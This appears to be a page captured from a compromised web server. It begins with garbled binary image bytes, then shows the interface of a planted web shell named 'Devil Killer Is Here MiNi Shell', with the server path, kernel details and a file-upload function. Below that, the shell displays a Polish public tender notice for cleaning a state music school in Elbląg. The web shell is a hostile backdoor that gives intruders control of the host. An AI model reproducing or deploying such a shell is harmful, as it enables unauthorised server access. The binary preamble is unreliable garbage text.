JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20230811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20230811/0035186801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług utrzymania czystości w budynku Zespołu Państwowych Szkół Muzycznych im. K. Wiłkomirskiego w Elblągu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ PAŃSTWOWYCH SZKÓŁ MUZYCZNYCH IM. KAZIMIERZA WIŁKOMIRSKIEGO W ELBLĄGU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000277279</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Romualda Traugutta 91</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">556114040</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">beata@elmuzyka.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.elmuzyka.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Umowy ramowej </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług utrzymania czystości w budynku Zespołu Państwowych Szkół Muzycznych im. K. Wiłkomirskiego w Elblągu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-694b614a-382f-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00351868</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.17.) Tryb zawarcia umowy ramowej wraz z podstawą prawną</h3> <p class="mb-0"> Umowa ramowa udzielana jest w trybie podstawowym na podstawie: art. 311 ust. 1 pkt 2 ustawy w zw. z art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-694b614a-382f-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. oraz poczty elektronicznej beata@elmuzyka.edu.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od<br/>wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.13. Zamawiający przewiduje pobranie ze złożonych katalogów elektronicznych danych potrzebnych do sporządzenia ofert dostosowanych do wymagań danego zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Państwowych Szkół Muzycznych z siedzibą przy ul. Traugutta 91, 82-300 Elbląg, reprezentowana przez: Dyrektora Andrzeja<br/>Korpackiego.<br/>1) Administrator wyznaczył Inspektora Ochrony Danych, <br/>kontakt e-mail: zpsm@iod24.pl<br/>2) Dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia publicznego Zp 1/VIII/2023<br/>”Świadczenie usług utrzymania czystości w budynku Zespołu Państwowych Szkół Muzycznych im. K. Wiłkomirskiego w Elblągu „<br/>prowadzonym w trybie podstawowym, na podstawie ustawy Pzp.<br/>3) Dane osobowe mogą być przekazywane wyłącznie podmiotom uprawnionym na podstawie przepisów prawa, między innymi<br/>Krajowej Izbie Odwoławczej w ramach prowadzenia postępowania<br/>odwoławczego.<br/>4) Dane osobowe przechowywane są przez okres niezbędny do realizacji wskazanych w ppkt 2) celów, a po tym czasie przez okres<br/>oraz w zakresie wymaganym przez przepisy prawa.<br/>5) Podanie danych osobowych jest wymogiem ustawowym, wynika z realizacji obowiązków wynikających z przepisów prawa, tj.<br/>ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego.<br/>6) Posiadają Państwo prawo do:<br/>- dostępu do treści swoich danych, ich sprostowania, ograniczenia przetwarzania*<br/>- złożenia skargi do organu nadzorczego: Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>Żądanie ograniczenia przetwarzania, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>Zamawiający dodatkowo informuje, że:<br/>1) Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia wszystkich obowiązków<br/>formalno-prawnych związanych z udziałem w postępowaniu. Do obowiązków tych należą m.in. obowiązki wynikające z RODO, w<br/>szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i<br/>od których dane te Wykonawca bezpośrednio pozyskał.<br/>Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba<br/>fizyczna, której dane dotyczą, dysponuje już tymi informacjami (vide: art. 13<br/>ust. 4).<br/>2) Wykonawca będzie musiał wypełnić obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane<br/>przekazuje Zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których<br/>mowa w art. 14 ust. 5 RODO.<br/>W związku z powyższym Zamawiający oczekuje, że Wykonawca złoży oświadczenie o treści:<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - - Usługi<br/>„Oświadczamy, że wypełniliśmy obowiązki informacyjne przewidziane w art. 13 lub art. 14 RODO wobec osób fizycznych, od których<br/>dane osobowe bezpośrednio lub pośrednio pozyskaliśmy w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym<br/>postępowaniu.”<br/>(Wykonawca nie musi składać ww. oświadczenia w przypadku gdy nie przekazuje danych osobowych innych niż bezpośrednio jego<br/>dotyczących lub zachodzi wyłączenie stosowania obowiązku<br/>informacyjnego, stosownie do art. 13 ust. 4 lub art. 14 ust. 5 RODO).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 1/VIII/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia:<br/>„Świadczenie usług utrzymania czystości w budynku Zespołu Państwowych Szkół Muzycznych im. K. Wiłkomirskiego w<br/>Elblągu” Przedmiotem zamówienia jest wykonanie usługi sprzątania w budynku Zespołu Państwowych Szkół Muzycznych,<br/>przy ul. Traugutta 91 w Elblągu<br/>2. Zakres zamówienia.<br/>Zakres zamówienia obejmuje utrzymanie czystości w pomieszczeniach:<br/>1. biurowych,<br/>2. klasach ogólnokształcących,<br/>3. klasach muzycznych,<br/>4. biblioteki szkolnej z pomieszczeniami przyległymi (czytelnia, wypożyczalnia)<br/>5. sala koncertowa wraz z pomieszczeniami przyległymi (przedsionek s. koncertowej, pomieszczenie na fortepian)<br/>6. sala kameralna wraz z pomieszczeniami przyległymi (pomieszczenie na fortepiany, zaplecze na pulpity i krzesła)<br/>7. sala gimnastyczna wraz z pomieszczeniami przyległymi (kantorek, 2 przebieralnie)<br/>8. ciągi komunikacyjne<br/>9. klatki schodowe<br/>10. foyer przy sali koncertowej i sali kameralnej<br/>11. łącznik<br/>12. toalety<br/>3. Ogół prac porządkowych w pomieszczeniach obiektu obejmować będzie następujący zakres<br/>czynności:<br/>1) codzienne odkurzanie dywanów, wykładzin podłogowych, tapicerowanych mebli,<br/>2) codzienne czyszczenie powierzchni podłogowych (zgodnie z zaleceniem lub instrukcją),<br/>3) mycie maszynowe ciągów komunikacyjnych oraz sali gimnastycznej co najmniej 1 raz w tygodniu<br/>4) przeprowadzenie raz na kwartał pokrycia akrylem wykładziny typu tarkett na ciągachkomunikacyjnych w terminach<br/>uzgodnionych z Zamawiającym<br/>5) codzienne czyszczenie i wycieranie kurzu z powierzchni biurek, szaf, szafek, szafek uczniowskich, ławek i stolików<br/>uczniowskich, regałów, półek i innego sprzętu biurowego, a także parapetów okiennych, pulpitów, drzwi, ościeżnic, listew<br/>ściennych, lamp, balustrad schodowych, tablic szkolnych, itp.,<br/>6) codzienne czyszczenie i wycieranie kurzu z pianin, fortepianów oraz przecieranie na wilgotno klawiszy pianin i<br/>fortepianów<br/>7) ostrożne i delikatne czyszczenie sprzętu komputerowego przy zachowaniu należytej staranności,<br/>8) codzienne opróżnianie i czyszczenie koszy na śmieci oraz wyposażanie ich w worki na śmieci,<br/>9) codzienne opróżnianie pojemników niszczarek oraz wyposażanie ich w odpowiednie worki na ścinki,<br/>10) obmiatanie ścian i sufitów z kurzu i pajęczyn,<br/>11) codzienne utrzymywanie w czystości powierzchni drzwi szklanych,<br/>12) systematyczne mycie drzwi w sanitariatach w miarę potrzeby, jednak nie rzadziej niż dwa razy w tygodniu<br/>13) systematyczne mycie drzwi w pozostałych pomieszczeniach, jednak nie rzadziej niż dwa razy w tygodniu<br/>14) mycie grzejników,<br/>15) codzienne porządkowanie i dezynfekcja toalet, czyszczenie glazury łazienkowej, armatury, luster wiszących z użyciem<br/>właściwych środków chemicznych do danego rodzaju nawierzchni (w tym środków do usuwania kamienia),<br/>16) wyposażanie i uzupełnianie na bieżąco wszystkich toalet w papier toaletowy dwuwarstwowy biały w dużych rolkach i<br/>małych rolkach, ręczniczki papierowe białe, mydło w płynie i w środki zapachowe (w toaletach i pisuarach)<br/>17) udrażnianie urządzeń sanitarnych w zakresie podstawowym (przetykanie z użyciem środków chemicznych),<br/>18) codzienne utrzymanie w należytym stanie gablot ogłoszeniowych umieszczonych na korytarzach (polerowanie przeszkleń i odkurzanie),<br/>19) czyszczenie i pranie wykładzin dywanowych oraz usuwanie w miarę potrzeb plam i zabrudzeń z wykładzin dywanowych<br/>i mebli tapicerowanych (zgodnie z harmonogramem<br/>zawartym w Załączniku nr 2 do wzoru umowy stanowiącego ZAŁĄCZNIK NR 3 do SWZ ),<br/>20) mycie okien tj. szyby, ramy, parapety zewnętrzne (każdą szybę należy myc zarówno po stronie wewnętrznej, jak i<br/>zewnętrznej) – 2 razy w roku w terminach uzgodnionych z Zamawiającym. Przy myciu okien usytuowanych przy klatkach<br/>schodowych, sali gimnastycznej, łącznika zachodzi konieczność korzystania z wysięgnika dźwigowego, które Wykonawca<br/>zabezpieczy we własnym zakresie. Powierzchnia mycia okien bez wysięgnika wynosi 697,45 m² z wysięgnikiem 203,37 m² (<br/>sala gimnastyczna, łącznik, klasy muzyczne na nowym skrzydle, klatki schodowe)<br/>21) codzienne utrzymanie w czystości windy i platformy<br/>22) pranie żaluzji pionowych i rolet (zgodnie z harmonogramem zawartym w Załączniku nr 2 do wzoru umowy stanowiącego<br/>ZAŁĄCZNIK NR 3 do SWZ).<br/>4. Zamawiający wymaga od Wykonawcy w ramach zawartej umowy, zabezpieczenia sprzątania w czasie trwania i<br/>zakończenia imprez szkolnych odbywających się w soboty i niedziele (średnio 5 razy w roku, dotyczy konkursów o zasięgi<br/>ogólnokrajowym i międzynarodowym) w godzinach ustalonych z Zamawiającym.<br/>5. Zamawiający wymaga od Wykonawcy, kompleksowego przygotowania pomieszczeń w trakcie ferii zimowych i letnich<br/>(klasy ogólnokształcące, muzyczne, salę koncertową, kameralną gimnastyczną, ciągi komunikacyjne, klatki schodowe,<br/>foyer, biblioteki szkolnej i pomieszczeń biurowych) do rozpoczęcia zajęć zgodnie z organizacją pracy szkoły. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90919300-5 - Usługi sprzątania szkół</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-01 do 2024-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający informuje, że przewiduje udzielenie zamówienia, o którym mowa w art. 214 ust. 1 pkt. 7 ustawy Prawo<br/>zamówień publicznych polegającego na powtórzeniu podobnych usług do zamówienia podstawowego.<br/>1) Zakres tych usług obejmuje utrzymanie czystości w budynku ZPSM w Elblągu wymienionych w pkt III. ppkt 2. SWZ w<br/>zakresie opisanym w pkt III. SWZ.<br/>2) Warunki, na jakich zostaną udzielone te usługi:<br/>a) zamówienie będzie mogło być udzielone w przypadku gdy Zamawiający będzie dysponował środkami finansowymi na<br/>jego realizację,<br/>b) umowa zostanie zawarta po przeprowadzeniu negocjacji z Wykonawcą,<br/>c) cena za wykonanie przedmiotu zamówienia zostanie ustalona podczas negocjacji na podstawie złożonego przez<br/>Wykonawcę formularza cenowego,<br/>d) ceny za poszczególne usługi nie będą mogły być wyższe niż ceny zaproponowane w zamówieniu podstawowym, chyba<br/>że Wykonawca uzasadni ich wzrost,<br/>e) termin wykonania zamówienia będzie proporcjonalny do zakresu zamówienia,<br/>f) wzór umowy zostanie przekazany Wykonawcy wraz z zaproszeniem do negocjacji,<br/>g) kary umowne będą przewidziane w takich samych wypadkach i w wysokości nie wyższej jak w umowie zawartej w<br/>postępowaniu na zamówienie podstawowe,<br/>h) obowiązki Wykonawcy i Zamawiającego będą uregulowane na zasadach analogicznych do umowy zawartej w<br/>postępowaniu na zamówienie podstawowe. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zakres tych usług<br/>obejmuje utrzymanie czystości w budynku ZPSM w Elblągu wymienionych w pkt III. ppkt 2. SWZ w zakresie opisanym w pkt III.<br/>SWZ.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Pokrycie pogłóg polimerem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa przedmiotowego warunku.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa przedmiotowego warunku.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa przedmiotowego warunku.<br/>4) zdolności technicznej lub zawodowej:<br/>Warunkiem udziału w postępowaniu jest:<br/>a) Warunkiem udziału w postępowaniu jest wykonanie lub wykonywanie w sposób należyty w okresie ostatnich 3 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 2 usług<br/>sprzątania przez okres min. 6 miesięcy w budynku użyteczności publicznej o powierzchni co najmniej 4000 m2.<br/>b) Warunek zostanie spełniony, gdy Wykonawca przedstawi wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych<br/>dostępnych Wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami:<br/>- 6 odkurzaczy przemysłowych o mocy 1500 -1700 wat, wyposażonych w worki na pył i odpady,<br/>- specjalistycznego sprzętu do czyszczenia na mokro wykładzin dywanowych, tapicerki meblowej i wykładzin czyszczonych<br/>na sucho oraz żaluzji pionowych i rolet<br/>- sprzętu do czyszczenia i polerowania posadzek pokrytych płytkami ceramicznymi, lastriko, tarkettu, wykładzin PCV- tzw.<br/>szorowarek<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga, aby co najmniej<br/>dwie usługi potwierdzające spełnienie przedmiotowego warunku zostały wykonane przez tego z Wykonawców wspólnie<br/>ubiegających się, który wykona usługi, do realizacji których te zdolności są wymagane.<br/>W przypadku, gdy Wykonawca w celu potwierdzenia spełniania tego warunku udziału polega na zdolnościach innego<br/>podmiotu Zamawiający wymaga, aby co najmniej dwie usługi<br/>potwierdzające spełnienie przedmiotowego warunku zostały wykonane przez ten podmiot, który wykona usługi, do realizacji<br/>których te zdolności są wymagane.<br/>W odniesieniu do przedmiotowego warunku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenia lub dokumenty, składane przez Wykonawcę na wezwanie Zamawiającego, potwierdzające spełnianie warunków udziału w postępowaniu:<br/>1) wykaz usług, wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem<br/>dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy.<br/>Uwaga:<br/>a) Dokument składany jest na potwierdzenie spełniania warunku udziału określonego w pkt XVII. ppkt 2 poz. 4) lit. a) SWZ.<br/>b) Przedmiot wykazanych usług należy podać z taką szczegółowością, która umożliwi Zamawiającemu sprawdzenie spełniania<br/>warunku określonego w pkt XVII. ppkt 2 poz. 4) lit. a) 